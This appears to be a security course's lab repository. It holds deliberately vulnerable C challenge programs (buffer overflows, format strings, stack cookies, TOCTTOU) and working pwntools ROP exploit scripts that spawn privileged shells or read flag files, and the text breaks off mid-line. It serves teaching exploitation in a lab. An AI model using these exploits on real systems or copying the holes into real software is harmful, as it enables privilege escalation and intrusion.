-------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #define _GNU_SOURCE 4 | #include 5 | #include 6 | 7 | #include 8 | 9 | void get_a_shell() { 10 | printf("Spawning a privileged shell\n"); 11 | setregid(getegid(), getegid()); 12 | execl("/bin/bash", "bash", NULL); 13 | } 14 | 15 | 16 | int keys[] = { 1, 720, 24, 2, 1, 6, 120 }; 17 | 18 | void password() { 19 | int i, j, a, b; 20 | int mykeys[8]; 21 | printf("Send me 7 lucky integers\n"); 22 | 23 | for(i=0; i<7; ++i) { 24 | printf("Integer %d: ", i+1); 25 | scanf("%d", &mykeys[i]); 26 | printf("Integer %d is %d\n", i+1, mykeys[i]); 27 | } 28 | 29 | j = keys[i]; 30 | for(i=0; i<7; ++i) { 31 | for(j=0; j<6; ++j) { 32 | a = keys[j]; 33 | b = keys[j+1]; 34 | if(a>b) { 35 | keys[j] = b; 36 | keys[j+1] = a; 37 | } 38 | } 39 | } 40 | 41 | for(i=0; i<7; ++i) { 42 | if(keys[i] != mykeys[i]) { 43 | printf("Oh no that's not the key\n"); 44 | return; 45 | } 46 | } 47 | 48 | printf("Great! you got my password!\n"); 49 | get_a_shell(); 50 | return; 51 | } 52 | 53 | int main() { 54 | printf("Let's start an esoteric game!\n"); 55 | password(); 56 | } 57 | -------------------------------------------------------------------------------- /solutions/week5/rop-1-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os 4 | 5 | # import pwntools 6 | from pwn import * 7 | 8 | env = {} 9 | 10 | # prepare the program name and args 11 | argv = [ 12 | "./rop-1-32", 13 | # "/home/labs/week6/challenges/rop/rop-1-32", 14 | ] 15 | 16 | p = process(argv, env=env) 17 | 18 | setregid_addr = p.elf.symbols['setregid'] 19 | execve_addr = p.elf.symbols['execve'] 20 | string_addr = 0x8048641 # 0x18 21 | 22 | #0x080486c8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 23 | ppppr_addr = 0x80486c8 24 | pppr_addr = 0x80486c9 25 | ppr_addr = 0x80486ca 26 | pr_addr = 0x80486cb 27 | 28 | if os.path.exists("\x18"): 29 | os.unlink("\x18") 30 | if not os.path.exists("\x18"): 31 | os.symlink("/bin/sh", "\x18") 32 | 33 | # prepare an exploit string 34 | # [dummy][setregid][pop-pop-ret][36001][36001][execve][XXXX][addr of "\xb8"][0][0] 35 | exploit_string = "D"* (0x88 + 4) + \ 36 | p32(setregid_addr) + p32(ppr_addr) + p32(50500) + p32(50500) + \ 37 | p32(execve_addr) + p32(0) + p32(string_addr) + p32(0) + p32(0) 38 | 39 | 40 | # Print your exploit as a txt file. 41 | # You can use this in gdb, e.g., 42 | # gdb-peda$ r < exploit.txt 43 | with open("exploit.txt", "wb") as f: 44 | f.write(exploit_string) 45 | f.close() 46 | 47 | # send the exploit 48 | p.sendline(exploit_string) 49 | 50 | # get an interactive pipe 51 | print p.interactive() 52 | -------------------------------------------------------------------------------- /src/week1/challenges/level7/level7.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #define _GNU_SOURCE 4 | #include 5 | #include 6 | 7 | #include 8 | 9 | void get_a_shell() { 10 | printf("Spawning a privileged shell\n"); 11 | setregid(getegid(), getegid()); 12 | execl("/bin/bash", "bash", NULL); 13 | } 14 | 15 | void add_a_space(char *string) { 16 | int i=0; 17 | while(string[i] != '\0') { 18 | string[i] = (string[i] + 0x20) & 0xff; 19 | i += 1; 20 | } 21 | } 22 | 23 | void password() { 24 | 25 | char buf[512]; 26 | 27 | memset(buf, 0, 512); 28 | 29 | scanf("%50s", buf); 30 | printf("Your buffer: %s\n", buf); 31 | 32 | int length = strlen(buf); 33 | 34 | memfrob(buf, length); 35 | add_a_space(buf); 36 | 37 | uint32_t value = atoi(buf); 38 | 39 | printf("Your Integer: %u\n", value); 40 | snprintf(buf, 20, "%x", value); 41 | printf("Your Hex Integer: %s\n", buf); 42 | 43 | length = strlen(buf); 44 | 45 | memfrob(buf, length); 46 | add_a_space(buf); 47 | 48 | if(memcmp(buf, ">:3hhn<", 4) == 0) { 49 | printf("Great! you got my password!\n"); 50 | get_a_shell(); 51 | return; 52 | } 53 | else { 54 | printf("Oh no\n"); 55 | } 56 | } 57 | 58 | int main() { 59 | printf("Let's start an esoteric game!\n"); 60 | password(); 61 | } 62 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level1/bof-level1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | void get_a_shell() { 9 | printf("Spawning a privileged shell\n"); 10 | setregid(getegid(), getegid()); 11 | execl("/bin/bash", "bash", NULL); 12 | } 13 | 14 | void receive_input() { 15 | uint64_t a = 0x4141414141414141, b = 0x4242424242424242; 16 | char buf[20]; 17 | 18 | printf("This is a 64-bit program.\n"); 19 | printf("The 1st argument will be passed via rdi, the 2nd will be passed via rsi,\nthe 3rd will be passed via rdx, the 4th will be pased via rcx, etc..\n"); 20 | printf("Values in two local variables are:\n" 21 | "a = 0x%016lx b = 0x%016lx\n", a, b); 22 | 23 | printf("Can you change these values to:\n" 24 | "a = 0x6867666564636261 and b = 0x4847464544434241?\n"); 25 | 26 | printf("Type YES if you agree with this... (a fake message, you may overflow the input buffer).\n"); 27 | fgets(buf, 128, stdin); 28 | printf("Now the variables store:\n" 29 | "a = 0x%016lx b = 0x%016lx\n", a, b); 30 | 31 | if(a == 0x6867666564636261 && b == 0x4847464544434241) { 32 | printf("Great!\n"); 33 | get_a_shell(); 34 | } 35 | else { 36 | printf("Analyze the program!\n"); 37 | } 38 | } 39 | 40 | int main() { 41 | receive_input(); 42 | } 43 | -------------------------------------------------------------------------------- /solutions/week7/deprivileged.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | flag = '' 7 | while len(flag) != 29: 8 | p = process("./get-flag-without-write-nor-exec") 9 | p.sendline("4") 10 | 11 | print(p.recv()) 12 | 13 | 14 | buf = "A" * (16 + 8) 15 | #0x400020: "@" 16 | #0x0000000000400d93 : pop rdi ; ret 17 | #0x0000000000400d91 : pop rsi ; pop r15 ; ret 18 | 19 | open_plt = p.elf.plt['open'] 20 | read_plt = p.elf.plt['read'] 21 | exit_plt = p.elf.plt['exit'] 22 | rdi_ret = 0x400d93 23 | rsi_r15_ret = 0x400d91 24 | 25 | # open 26 | buf += p64(rdi_ret) 27 | buf += p64(0x400020) 28 | buf += p64(rsi_r15_ret) 29 | buf += p64(0) 30 | buf += p64(0) 31 | buf += p64(open_plt) 32 | 33 | # read 34 | buf += p64(rdi_ret) 35 | buf += p64(4) 36 | buf += p64(rsi_r15_ret) 37 | buf += p64(0x602800) 38 | buf += p64(0x602800) 39 | buf += p64(read_plt) 40 | 41 | # set rbp as target_addr + 4 42 | #0x0000000000400940 : pop rbp ; ret 43 | buf += p64(0x400940) 44 | buf += p64(0x602800 + 0x14 + len(flag)) 45 | 46 | buf += p64(0x400b18) 47 | buf += p64(0) 48 | buf += p64(0) 49 | buf += p64(0) 50 | buf += p64(0) 51 | buf += p64(0) 52 | buf += p64(exit_plt) 53 | 54 | 55 | p.sendline(buf) 56 | p.wait() 57 | ret = p.poll() 58 | print(ret) 59 | flag += chr(ret) 60 | p.close() 61 | 62 | print(flag) 63 | -------------------------------------------------------------------------------- /solutions/week7/get-flag-without-write-nor-exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | 6 | flag = '' 7 | while len(flag) != 29: 8 | p = process("./get-flag-without-write-nor-exec") 9 | p.sendline("4") 10 | 11 | print(p.recv()) 12 | 13 | 14 | buf = "A" * (16 + 8) 15 | #0x400020: "@" 16 | #0x0000000000400d93 : pop rdi ; ret 17 | #0x0000000000400d91 : pop rsi ; pop r15 ; ret 18 | 19 | open_plt = p.elf.plt['open'] 20 | read_plt = p.elf.plt['read'] 21 | exit_plt = p.elf.plt['exit'] 22 | rdi_ret = 0x400d93 23 | rsi_r15_ret = 0x400d91 24 | 25 | # open 26 | buf += p64(rdi_ret) 27 | buf += p64(0x400020) 28 | buf += p64(rsi_r15_ret) 29 | buf += p64(0) 30 | buf += p64(0) 31 | buf += p64(open_plt) 32 | 33 | # read 34 | buf += p64(rdi_ret) 35 | buf += p64(4) 36 | buf += p64(rsi_r15_ret) 37 | buf += p64(0x602800) 38 | buf += p64(0x602800) 39 | buf += p64(read_plt) 40 | 41 | # set rbp as target_addr + 4 42 | #0x0000000000400940 : pop rbp ; ret 43 | buf += p64(0x400940) 44 | buf += p64(0x602800 + 0x14 + len(flag)) 45 | 46 | buf += p64(0x400b18) 47 | buf += p64(0) 48 | buf += p64(0) 49 | buf += p64(0) 50 | buf += p64(0) 51 | buf += p64(0) 52 | buf += p64(exit_plt) 53 | 54 | 55 | p.sendline(buf) 56 | p.wait() 57 | ret = p.poll() 58 | print(ret) 59 | flag += chr(ret) 60 | p.close() 61 | 62 | print(flag) 63 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-no-binary-pie-64/fs-no-binary-pie-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | void 18 | call_many_functions() { 19 | puts(""); 20 | open("", 0, 0); 21 | read(0, "", 0); 22 | write(1, "", 0); 23 | chdir(""); 24 | getpid(); 25 | getppid(); 26 | fopen("", ""); 27 | fclose(0); 28 | fread(NULL, 0, 0, 0); 29 | fwrite(NULL, 0, 0, 0); 30 | } 31 | 32 | int input_func() { 33 | 34 | char name[1024]; 35 | printf("Please type your name first: \n"); 36 | // only reads 1023 chars at max 37 | read(0, name, 1023); 38 | printf("Hello "); 39 | printf(name); 40 | printf("\n"); 41 | 42 | printf("Please type your affiliation: \n"); 43 | // only reads 1023 chars at max 44 | read(0, name, 1023); 45 | printf("You are from: "); 46 | printf(name); 47 | printf("\n"); 48 | 49 | setregid("asdf", 0); 50 | chdir("ASDF"); 51 | write(1, "No binary, it does not make any sense!\n", 39); 52 | 53 | return 0; 54 | } 55 | 56 | int main(int argc, char** argv, char** envp) { 57 | setvbuf(stdin, NULL, _IONBF, 0); 58 | setvbuf(stdout, NULL, _IONBF, 0); 59 | setvbuf(stderr, NULL, _IONBF, 0); 60 | input_func(); 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /src/week4/challenges/5-stack-cookie-3/stack-cookie-3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | 7 | // Please check the assembly for the correct buffer size 8 | #ifndef BUFSIZE 9 | #define BUFSIZE 128 10 | #endif 11 | 12 | #include 13 | #include 14 | #include 15 | 16 | __attribute__((constructor)) 17 | static void set_dumpable() { 18 | prctl(PR_SET_DUMPABLE, 1); 19 | } 20 | 21 | int input_func(int a) { 22 | 23 | // check assembly. GCC Stack cookie is here. 24 | 25 | size_t size; 26 | printf("How many bytes do you want to read?\n"); 27 | scanf("%lu", &size); 28 | // name buffer to overflow 29 | char buf[BUFSIZE]; 30 | printf("Reading %lu bytes: \n", size); 31 | read(0, buf, size); 32 | 33 | printf("Hello %s!\n", buf); 34 | 35 | // check assembly. GCC Stack cookie is here. 36 | 37 | return 0; 38 | } 39 | 40 | int non_main_func(void) { 41 | int i = 2000; 42 | while(i) { 43 | printf("You have %d trials left\n", i--); 44 | int pid = fork(); 45 | if(!pid) { 46 | input_func(0); 47 | // exit with zero if you do not change the return address 48 | exit(0); 49 | } 50 | else { 51 | int status = 0; 52 | waitpid(pid, &status, 0); 53 | printf("Exit status: %d\n", status); 54 | } 55 | } 56 | } 57 | 58 | int main(int argc, char** argv, char** envp) { 59 | non_main_func(); 60 | return 0; 61 | } 62 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-code-exec-pie-64/fs-code-exec-pie-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | int read_random() { 18 | int fd = open("/dev/urandom", O_RDONLY); 19 | int ret; 20 | if(fd < 0) { 21 | printf("Error on opening random\n"); 22 | exit(-1); 23 | } 24 | read(fd, &ret, 4); 25 | return ret; 26 | } 27 | 28 | int global_random = 0; 29 | 30 | int input_func() { 31 | 32 | char name[1024]; 33 | printf("Please type your name first: \n"); 34 | // only reads 1023 chars at max 35 | read(0, name, 1023); 36 | printf("Hello "); 37 | printf(name); 38 | printf("\n"); 39 | 40 | printf("Please type your affiliation: \n"); 41 | // only reads 1023 chars at max 42 | read(0, name, 1023); 43 | printf("You are from: "); 44 | printf(name); 45 | printf("\n"); 46 | 47 | printf("Please leave a note: \n"); 48 | // only reads 1023 chars at max 49 | read(0, name, 1023); 50 | printf("Your note is: "); 51 | printf(name); 52 | printf("\n"); 53 | 54 | puts("Thank you!"); 55 | 56 | return 0; 57 | } 58 | 59 | int main(int argc, char** argv, char** envp) { 60 | // Inherit EGID here.. 61 | setregid(getegid(), getegid()); 62 | input_func(); 63 | return 0; 64 | } 65 | -------------------------------------------------------------------------------- /src/week1/challenges/level2/level2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | uint64_t result; 9 | uint32_t value1, value2, value3; 10 | 11 | void get_a_shell() { 12 | printf("Spawning a privileged shell\n"); 13 | setregid(getegid(), getegid()); 14 | execl("/bin/bash", "bash", NULL); 15 | } 16 | 17 | void get1() { 18 | printf("Input for X:\n"); 19 | scanf("%u", &value1); 20 | } 21 | void get2() { 22 | printf("Input for Y:\n"); 23 | scanf("%u", &value2); 24 | } 25 | void get3() { 26 | printf("Input for Z:\n"); 27 | scanf("%u", &value3); 28 | } 29 | 30 | void calculate() { 31 | result = value3 * value2 + value1; 32 | if(result == 0x444e4143ul) { 33 | printf("Correct!\n"); 34 | get_a_shell(); 35 | } 36 | else { 37 | printf("Wrong value %llu!!\n", result); 38 | } 39 | } 40 | 41 | 42 | int main() { 43 | result = value1 = value2 = value3 = 0; 44 | 45 | printf("Let's start a game of three integers!\n"); 46 | printf("We will do a simple calculation: X # Y ? Z = W,\n" \ 47 | "where X, Y, Z, and W are uint32_t values, and # and ? are\n" \ 48 | "some operators...\n"); 49 | printf("Your job is to get the operators, and match your X, Y, and Z\n" \ 50 | "values to W after applying all operators...\n"); 51 | get1(); 52 | get2(); 53 | get3(); 54 | 55 | calculate(); 56 | } 57 | -------------------------------------------------------------------------------- /src/week2/challenges/bof-level3/bof-level3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | void get_a_shell() { 9 | printf("Spawning a privileged shell\n"); 10 | setregid(getegid(), getegid()); 11 | execl("/bin/bash", "bash", NULL); 12 | } 13 | 14 | void receive_input() { 15 | uint64_t a = 0x4141414141414141, b = 0x4242424242424242; 16 | char buf[20]; 17 | 18 | printf("This is a 64-bit program.\n"); 19 | printf("The 1st argument will be passed via rdi, the 2nd will be passed via rsi,\nthe 3rd will be passed via rdx, the 4th will be pased via rcx, etc..\n"); 20 | printf("Values in two local variables are:\n" 21 | "a = 0x%016lx b = 0x%016lx\n", a, b); 22 | 23 | printf("Can you change these values to:\n" 24 | "a = 0x6867666564636261 and b = 0x4847464544434241?\n"); 25 | 26 | printf("Type YES if you agree with this... (a fake message, you may overflow the input buffer).\n"); 27 | fgets(buf, 128, stdin); 28 | printf("Now the variables store:\n" 29 | "a = 0x%016lx b = 0x%016lx\n", a, b); 30 | 31 | if(a == 0x6867666564636261 && b == 0x4847464544434241) { 32 | printf("Great, but I will not execute get_a_shell() for you..\n"); 33 | printf("Run it yourself!\n"); 34 | } 35 | else { 36 | printf("Analyze the program!\n"); 37 | exit(-1); 38 | } 39 | } 40 | 41 | int main() { 42 | receive_input(); 43 | } 44 | -------------------------------------------------------------------------------- /src/week7/challenges/guess-my-random/guess-my-random.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | #define MAX_BUFFER_SIZE 64 9 | 10 | void 11 | please_run_this(void) { 12 | setregid(getegid(), getegid()); 13 | execve("/bin/sh", 0, 0); 14 | } 15 | 16 | char RANDOM_STRING[MAX_BUFFER_SIZE]; 17 | 18 | void 19 | read_random(void) { 20 | int fd = open("/dev/urandom", O_RDONLY); 21 | if (fd < 0) { 22 | printf("Error, can't open /dev/urandom\n"); 23 | exit(-1); 24 | } 25 | uint32_t random_int = 0; 26 | read(fd, &random_int, sizeof(uint32_t)); 27 | close(fd); 28 | if (random_int == 0) { 29 | printf("Error, random read failed\n"); 30 | exit(-1); 31 | } 32 | sprintf(RANDOM_STRING, "RANDVAL==%p\n", (void*)random_int); 33 | target(); 34 | } 35 | 36 | int max_read_size = 63; 37 | 38 | void target() { 39 | printf("Please guess my random!\n"); 40 | printf("Please type a hexadecimal number!\n"); 41 | 42 | char string[MAX_BUFFER_SIZE]; 43 | char buf[MAX_BUFFER_SIZE]; 44 | 45 | fgets(buf, MAX_BUFFER_SIZE, stdin); 46 | sprintf(string, "RANDVAL==%s", buf); 47 | 48 | if (strcmp(string, RANDOM_STRING) == 0) { 49 | printf("Great!\n"); 50 | please_run_this(); 51 | } 52 | else { 53 | printf("Wrong guess! My secret random was %s", RANDOM_STRING); 54 | } 55 | } 56 | 57 | int main() { 58 | read_random(); 59 | } 60 | -------------------------------------------------------------------------------- /src/week1/challenges/level9/level9.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #define _GNU_SOURCE 4 | #include 5 | #include 6 | 7 | #include 8 | #include 9 | 10 | void get_a_shell() { 11 | printf("Spawning a privileged shell\n"); 12 | setregid(getegid(), getegid()); 13 | execl("/bin/bash", "bash", NULL); 14 | } 15 | 16 | int keys[512]; 17 | void number_generator() { 18 | int t = 2; 19 | int v; 20 | int p; 21 | keys[0] = 2; 22 | keys[1] = 3; 23 | 24 | for(v=4;t<500;v++) { 25 | for(p=0;p v) { 28 | keys[t] = v; 29 | t += 1; 30 | break; 31 | } 32 | if(v%tv == 0) { 33 | break; 34 | } 35 | } 36 | if(t == 500) break; 37 | } 38 | } 39 | 40 | int keys[] = { 3, 4 }; 41 | 42 | int check(int value) { 43 | for(int i=0; i<500; ++i) { 44 | if(value % keys[i] == 0) return 0; 45 | } 46 | return 1; 47 | } 48 | 49 | void password() { 50 | int answer; 51 | printf("Please send me the password.\n"); 52 | scanf("%d", &answer); 53 | 54 | if(check(answer)) { 55 | printf("Great! you got my password!\n"); 56 | get_a_shell(); 57 | } 58 | else { 59 | printf("Uh oh, wrong value.\n"); 60 | } 61 | } 62 | 63 | int main() { 64 | number_generator(); 65 | printf("Let's start a game!\n"); 66 | password(); 67 | } 68 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-32/fs-read-1-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | 18 | // Get a random value from a secure source 19 | int read_random() { 20 | int fd = open("/dev/urandom", O_RDONLY); 21 | int ret; 22 | if(fd < 0) { 23 | printf("Error on opening random\n"); 24 | exit(-1); 25 | } 26 | read(fd, &ret, 4); 27 | return ret; 28 | } 29 | 30 | int input_func() { 31 | 32 | char name[64]; 33 | 34 | // read random here 35 | int random = read_random(); 36 | 37 | int other = 0; 38 | 39 | printf("Please type your name first: \n"); 40 | // only reads 63 chars at max; no buffer overflow. 41 | read(0, name, 63); 42 | 43 | printf("Hello "); 44 | // A Format String vulnerability here 45 | printf(name); 46 | printf("\n"); 47 | 48 | printf("Can you guess the random?\n"); 49 | scanf("%x", &other); 50 | 51 | // You must guess and match the random! 52 | if(other == random) { 53 | printf("Great!\n"); 54 | setregid(getegid(), getegid()); 55 | system("/bin/bash"); 56 | } 57 | else { 58 | printf("Wrong, your random was 0x%08x but you typed 0x%08x\n", 59 | random, other); 60 | exit(-1); 61 | } 62 | return 0; 63 | } 64 | 65 | int main(int argc, char** argv, char** envp) { 66 | input_func(); 67 | return 0; 68 | } 69 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-read-1-64/fs-read-1-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | 18 | // Get a random value from a secure source 19 | int read_random() { 20 | int fd = open("/dev/urandom", O_RDONLY); 21 | int ret; 22 | if(fd < 0) { 23 | printf("Error on opening random\n"); 24 | exit(-1); 25 | } 26 | read(fd, &ret, 4); 27 | return ret; 28 | } 29 | 30 | int input_func() { 31 | 32 | char name[64]; 33 | 34 | // read random here 35 | int random = read_random(); 36 | 37 | int other = 0; 38 | 39 | printf("Please type your name first: \n"); 40 | // only reads 63 chars at max; no buffer overflow. 41 | read(0, name, 63); 42 | 43 | printf("Hello "); 44 | // A Format String vulnerability here 45 | printf(name); 46 | printf("\n"); 47 | 48 | printf("Can you guess the random?\n"); 49 | scanf("%x", &other); 50 | 51 | // You must guess and match the random! 52 | if(other == random) { 53 | printf("Great!\n"); 54 | setregid(getegid(), getegid()); 55 | system("/bin/bash"); 56 | } 57 | else { 58 | printf("Wrong, your random was 0x%08x but you typed 0x%08x\n", 59 | random, other); 60 | exit(-1); 61 | } 62 | return 0; 63 | } 64 | 65 | int main(int argc, char** argv, char** envp) { 66 | input_func(); 67 | return 0; 68 | } 69 | -------------------------------------------------------------------------------- /solutions/week5/rop-2-32.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import os 4 | 5 | # import pwntools 6 | from pwn import * 7 | 8 | env = {} 9 | 10 | # prepare the program name and args 11 | argv = [ 12 | #"/home/labs/week6/challenges/rop/rop-3-32", 13 | "./rop-2-32", 14 | ] 15 | 16 | p = process(argv, env=env) 17 | 18 | open_addr = p.elf.symbols['open'] 19 | read_addr = p.elf.symbols['read'] 20 | write_addr = p.elf.symbols['write'] 21 | string_addr = 0x804860f # 0x18 22 | 23 | #0x08048688 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 24 | ppppr_addr = 0x8048688 25 | pppr_addr = 0x8048689 26 | ppr_addr = 0x804868a 27 | pr_addr = 0x804868b 28 | 29 | buffer_addr = 0x804a028 30 | 31 | if os.path.exists("\x18"): 32 | os.unlink("\x18") 33 | if not os.path.exists("\x18"): 34 | os.unlink("\x18") 35 | os.symlink("flag", "\x18") 36 | 37 | # prepare an exploit string 38 | # [dummy][setregid][pop-pop-ret][36001][36001][execve][XXXX][addr of "\xb8"][0][0] 39 | exploit_string = "D"* 140 + \ 40 | p32(open_addr) + p32(ppr_addr) + p32(string_addr) + p32(0) + \ 41 | p32(read_addr) + p32(pppr_addr) + p32(3) + p32(buffer_addr) + p32(100) + \ 42 | p32(write_addr) + p32(pppr_addr) + p32(1) + p32(buffer_addr) + p32(100) 43 | 44 | 45 | # Print your exploit as a txt file. 46 | # You can use this in gdb, e.g., 47 | # gdb-peda$ r < exploit.txt 48 | with open("exploit.txt", "wb") as f: 49 | f.write(exploit_string) 50 | f.close() 51 | 52 | # send the exploit 53 | p.sendline(exploit_string) 54 | 55 | # get an interactive pipe 56 | print p.interactive() 57 | -------------------------------------------------------------------------------- /solutions/week5/rop-5-64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | 5 | p = process("./rop-leak-got-64") 6 | 7 | e = ELF('/lib/x86_64-linux-gnu/libc.so.6') 8 | puts_offset = e.symbols['puts'] 9 | execve_offset = e.symbols['execve'] 10 | 11 | offset_diff = execve_offset - puts_offset 12 | 13 | input_func = p.elf.symbols['input_func'] 14 | printf_func = p.elf.symbols['puts'] 15 | strcpy_func = p.elf.symbols['strcpy'] 16 | 17 | print p.recvline() 18 | 19 | puts_got = 0x0601018 20 | 21 | template = "A" * 0x88 22 | 23 | payload = template 24 | 25 | #0x0000000000400763 : pop rdi ; ret 26 | #0x0000000000400688 : pop rdx ; nop ; pop rbp ; ret 27 | #0x0000000000400761 : pop rsi ; pop r15 ; ret 28 | p_rdi_r = 0x400763 29 | p_rdx_rbp_r = 0x400688 30 | p_rsi_r15_r = 0x400761 31 | 32 | 33 | payload += p64(p_rdi_r) + p64(puts_got) + p64(printf_func) + p64(input_func) 34 | 35 | p.send(payload) 36 | 37 | print p.recvline() 38 | 39 | data = p.recv(0x100) 40 | 41 | print(repr(data)) 42 | 43 | libc_puts = u64(data[0:6] + "\x00\x00") 44 | print(hex(libc_puts)) 45 | print(hex(puts_offset)) 46 | libc_execve = libc_puts + offset_diff 47 | print(hex(libc_execve)) 48 | 49 | import os 50 | if not os.path.exists("\xb8"): 51 | os.symlink("sh", "\xb8") 52 | 53 | string = 0x4006ea 54 | payload = template 55 | payload += p64(p_rdi_r) + p64(string) + p64(p_rsi_r15_r) + p64(0) + p64(0) + \ 56 | p64(p_rdx_rbp_r) + p64(0) + p64(0) + p64(libc_execve) 57 | 58 | with open('exploit.txt', 'wb') as f: 59 | f.write(payload) 60 | 61 | p.send(payload) 62 | p.interactive() 63 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-32/fs-arbt-read-32.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | 18 | // Random value as a global variable (.bss) 19 | int random_value; 20 | 21 | void read_random() { 22 | int fd = open("/dev/urandom", O_RDONLY); 23 | if(fd < 0) { 24 | printf("Error on opening random\n"); 25 | exit(-1); 26 | } 27 | // directly read it to .bss. No trace on the stack! 28 | read(fd, &random_value, 4); 29 | close(fd); 30 | } 31 | 32 | int input_func() { 33 | int other = 0; 34 | char name[64]; 35 | printf("Please type your name first: \n"); 36 | // only reads 63 chars at max 37 | read(0, name, 63); 38 | printf("Hello "); 39 | 40 | // Format String Vulnerability here 41 | printf(name); 42 | 43 | 44 | printf("\n"); 45 | printf("Can you guess the random?\n"); 46 | scanf("%x", &other); 47 | 48 | // Ah, random is not on the stack. How come??????? 49 | if(other == random_value) { 50 | printf("Great!\n"); 51 | setregid(getegid(), getegid()); 52 | system("/bin/bash"); 53 | } 54 | else { 55 | printf("Wrong, your random was 0x%08x but you typed 0x%08x\n", 56 | random_value, other); 57 | exit(-1); 58 | } 59 | return 0; 60 | } 61 | 62 | int main(int argc, char** argv, char** envp) { 63 | read_random(); 64 | input_func(); 65 | return 0; 66 | } 67 | -------------------------------------------------------------------------------- /src/week6/challenges/fs-arbt-read-64/fs-arbt-read-64.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #ifndef BUFSIZE 7 | #define BUFSIZE 128 8 | #endif 9 | 10 | #include 11 | 12 | __attribute__((constructor)) 13 | static void set_dumpable() { 14 | prctl(PR_SET_DUMPABLE, 1); 15 | } 16 | 17 | 18 | // Random value as a global variable (.bss) 19 | int random_value; 20 | 21 | void read_random() { 22 | int fd = open("/dev/urandom", O_RDONLY); 23 | if(fd < 0) { 24 | printf("Error on opening random\n"); 25 | exit(-1); 26 | } 27 | // directly read it to .bss. No trace on the stack! 28 | read(fd, &random_value, 4); 29 | close(fd); 30 | } 31 | 32 | int input_func() { 33 | int other = 0; 34 | char name[64]; 35 | printf("Please type your name first: \n"); 36 | // only reads 63 chars at max 37 | read(0, name, 63); 38 | printf("Hello "); 39 | 40 | // Format String Vulnerability here 41 | printf(name); 42 | 43 | 44 | printf("\n"); 45 | printf("Can you guess the random?\n"); 46 | scanf("%x", &other); 47 | 48 | // Ah, random is not on the stack. How come??????? 49 | if(other == random_value) { 50 | printf("Great!\n"); 51 | setregid(getegid(), getegid()); 52 | system("/bin/bash"); 53 | } 54 | else { 55 | printf("Wrong, your random was 0x%08x but you typed 0x%08x\n", 56 | random_value, other); 57 | exit(-1); 58 | } 59 | return 0; 60 | } 61 | 62 | int main(int argc, char** argv, char** envp) { 63 | read_random(); 64 | input_func(); 65 | return 0; 66 | } 67 | -------------------------------------------------------------------------------- /src/week7/challenges/tocttou/tocttou.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | int 13 | main() { 14 | char filename[512]; 15 | printf("Welcome to Secure File Reader!\n"); 16 | printf("Hint: Exploit Time-of-check-to-time-of-use (TOCTTOU) bug!\n"); 17 | printf("Type the name of file that you would like to open!\n"); 18 | fgets(filename, 100, stdin); 19 | 20 | for (int i=0; i<100; ++i) { 21 | if (filename[i] == '\n') 22 | filename[i] = '\0'; 23 | } 24 | 25 | // time of check 26 | printf("Stat of the file:\n"); 27 | struct stat s; 28 | int ret = stat(filename, &s); 29 | if (ret != 0) { 30 | printf("Stat failed, please put the name of real file!\n"); 31 | exit(-1); 32 | } 33 | printf("My gid is %d, the file is with the group id %d!\n", getgid(), 